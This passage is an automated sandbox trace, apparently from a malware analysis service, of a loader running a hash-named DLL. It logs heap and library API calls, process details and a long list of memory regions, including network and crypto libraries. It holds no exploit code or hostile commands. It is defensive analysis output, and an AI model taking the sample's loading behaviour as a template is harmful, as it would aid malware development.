lpMem=0x4e3eb0 | out: hHeap=0x4e0000) returned 1 [0288.962] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f0b30 | out: hHeap=0x4e0000) returned 1 [0288.963] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4eb2f0 | out: hHeap=0x4e0000) returned 1 [0288.963] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f0590 | out: hHeap=0x4e0000) returned 1 [0288.963] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4e3f30 | out: hHeap=0x4e0000) returned 1 [0288.963] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4e3f50 | out: hHeap=0x4e0000) returned 1 [0288.963] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4eb9e0 | out: hHeap=0x4e0000) returned 1 [0288.963] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4eb7d0 | out: hHeap=0x4e0000) returned 1 [0288.963] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4eba20 | out: hHeap=0x4e0000) returned 1 [0288.963] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4eb320 | out: hHeap=0x4e0000) returned 1 [0288.963] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4eba60 | out: hHeap=0x4e0000) returned 1 [0288.963] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4e3f70 | out: hHeap=0x4e0000) returned 1 [0288.963] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4ebae0 | out: hHeap=0x4e0000) returned 1 [0288.963] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4e8d00 | out: hHeap=0x4e0000) returned 1 [0288.963] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f82d0 | out: hHeap=0x4e0000) returned 1 [0288.963] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f8810 | out: hHeap=0x4e0000) returned 1 [0288.963] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4e8d20 | out: hHeap=0x4e0000) returned 1 [0288.964] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4eb620 | out: hHeap=0x4e0000) returned 1 [0288.964] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f91e0 | out: hHeap=0x4e0000) returned 1 [0288.964] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4eb710 | out: hHeap=0x4e0000) returned 1 [0288.964] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f9060 | out: hHeap=0x4e0000) returned 1 [0288.964] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4e9ed0 | out: hHeap=0x4e0000) returned 1 [0288.964] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4e4400 | out: hHeap=0x4e0000) returned 1 [0288.968] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5ee0 | out: hHeap=0x4e0000) returned 1 [0288.969] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0288.969] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4eaca0 | out: hHeap=0x4e0000) returned 1 [0288.969] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5b10 | out: hHeap=0x4e0000) returned 1 [0288.969] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0288.969] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0288.969] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0288.969] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0288.969] FreeLibrary (hLibModule=0x7ffc5ecd0000) returned 1 [0288.972] LocalFree (hMem=0x4e9770) returned 0x0 [0288.972] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff626f50000 [0288.972] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff626f50000 [0288.972] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f2280 | out: hHeap=0x4e0000) returned 1 [0288.973] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4680 | out: hHeap=0x4e0000) returned 1 [0288.973] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x7ffc5be50000 [0288.973] GetProcAddress (hModule=0x7ffc5be50000, lpProcName="AppPolicyGetProcessTerminationMethod") returned 0x0 [0288.973] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x14fe98 | out: phModule=0x14fe98) returned 0 [0288.973] ExitProcess (uExitCode=0x0) [0288.974] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4ec320 | out: hHeap=0x4e0000) returned 1 Thread: id = 211 os_tid = 0x11e0 Process: id = "30" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x63f11000" os_pid = "0x126c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_cstr_info" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9958 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9959 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9960 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 9961 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 9962 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 9963 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9964 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 9965 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9966 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 9967 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 9968 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10062 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10063 start_va = 0x4a0000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 10064 start_va = 0x5a0000 end_va = 0x65dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10065 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 10066 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10067 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10068 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10069 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10070 start_va = 0x660000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 10071 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 10170 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10171 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 10172 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 10173 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 10174 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10175 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 10176 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 10177 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10178 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10179 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 10180 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 10181 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 10182 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 10183 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 10184 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 10286 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10287 start_va = 0x760000 end_va = 0x8e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 10288 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10289 start_va = 0x8f0000 end_va = 0xa70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 10290 start_va = 0xa80000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 10381 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 10382 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 10383 start_va = 0x1e80000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 10384 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 10466 start_va = 0x1f40000 end_va = 0x1ffffff monitored = 0 entry_point = 0x1f60da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 10467 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 10661 start_va = 0x1f40000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 10662 start_va = 0x2040000 end_va = 0x223ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 10663 start_va = 0x2240000 end_va = 0x263ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 10762 start_va = 0x2640000 end_va = 0x2e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002640000" filename = "" Region: id = 10943 start_va = 0x2e40000 end_va = 0x3e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e40000" filename = "" Region: id = 11939 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 11944 start_va = 0x3e10000 end_va = 0x4146fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 11966 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 11967 start_va = 0x4150000 end_va = 0x43e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 12113 start_va = 0x4150000 end_va = 0x429dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 12311 start_va = 0x4150000 end_va = 0x4313fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 13596 start_va = 0x4150000 end_va = 0x56d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 13646 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 13648 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 13649 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 13650 start_va = 0x4150000 end_va = 0x4315fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 13652 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 13653 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 13654 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 13655 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 13656 start_va = 0x4150000 end_va = 0x42b5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 13657 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1afff monitored = 0 entry_point = 0x7ffc4bf124e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 13658 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 13659 start_va = 0x1b0000 end_va = 0x1d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 13660 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 13661 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13662 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13663 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13664 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13665 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13666 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13667 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13668 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13669 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13670 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13671 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13672 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13673 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13674 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13675 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13676 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13677 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13678 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13679 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13680 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13681 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13682 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13683 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13684 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13685 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13686 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13687 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13688 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13689 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13690 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13691 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13692 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13693 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13694 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13695 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13696 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13697 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13698 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13699 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13700 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13701 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13702 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13703 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13704 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13705 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13706 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13707 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 